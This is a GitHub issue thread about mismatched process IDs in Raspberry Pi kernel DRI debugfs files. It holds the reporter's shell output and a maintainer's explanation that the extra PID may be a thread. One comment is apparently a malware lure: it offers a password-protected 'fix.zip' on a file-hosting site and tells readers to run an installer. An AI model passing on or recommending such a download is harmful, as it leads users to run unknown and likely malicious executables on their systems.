raspberrypi/linux #6329: incorrect pid information in /sys/kernel/debug/dri/0/gpu_pid_usage

xiaohuirong, 2024-08-28:
### Describe the bug

The pid information in `/sys/kernel/debug/dri/0/clients` and `/sys/kernel/debug/dri/0/gpu_pid_usage` does not match; the one in `clients` is correct. 

### Steps to reproduce the behaviour

```
╭─alarm@alarm /sys/kernel/debug/dri/0  
╰─➤  cat clients      
             command  tgid dev master a   uid      magic
             wayfire  1456 128   n    n  1000          0
             wayfire  1456 128   n    n  1000          0
             wayfire  1456 128   n    n  1000          0
             wayfire  1456 128   n    n  1000          0
             wayfire  1456 128   n    n  1000          0
            Xwayland  1549 128   n    n  1000          0
              wayvnc  1551 128   n    n  1000          0
           alacritty 30364 128   n    n  1000          0
                 mpv 30530 128   n    n  1000          0
                 mpv 30530 128   n    n  1000          0
╭─alarm@alarm /sys/kernel/debug/dri/0  
╰─➤  cat gpu_pid_usage
timestamp;16794859031802;
"QUEUE";"PID","JOBS";"RUNTIME";"ACTIVE";
v3d_bin;30540;1305;210656861;0;
v3d_bin;1456;347;32271707;0;
v3d_bin;30364;95;22641255;0;
v3d_render;30540;1305;5237949335;0;
v3d_render;1456;348;980642219;0;
v3d_render;30364;95;279443699;0;
v3d_tfu;30540;783;199907245;0;

```
In `clients`, the pid for `mpv` is 30530, while in `gpu_pid_usage`, the pid is incorrectly identified as 30540.

### Device (s)

Raspberry Pi 4 Mod. B

### System

- OS: ArchLinux Arm aarch64
- uname -a: `Linux alarm 6.6.47-2-rpi #1 SMP PREEMPT Sun Aug 25 05:44:51 MDT 2024 aarch64 GNU/Linux`
- vcgencmd version:
```
Jul 25 2024 15:00:11 
Copyright (c) 2012 Broadcom
version 8a2829a2ff4d4808cc14e10de7068e6afb45c96d (tainted) (release) (start)
```

HTneko, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

pelwell, 2024-09-03:
> In clients, the pid for mpv is 30530, while in gpu_pid_usage, the pid is incorrectly identified as 30540.

`mpv` does not appear in the output of `cat gpu_pid_usage`. What makes you think that the 30540s there correspond to `mpv`?

Also, if you take a look at the output of `pstree -p` you'll see processes and the threads they contain. 30540 might be a thread in the `mpv` process.

closed 2024-09-04 by xiaohuirong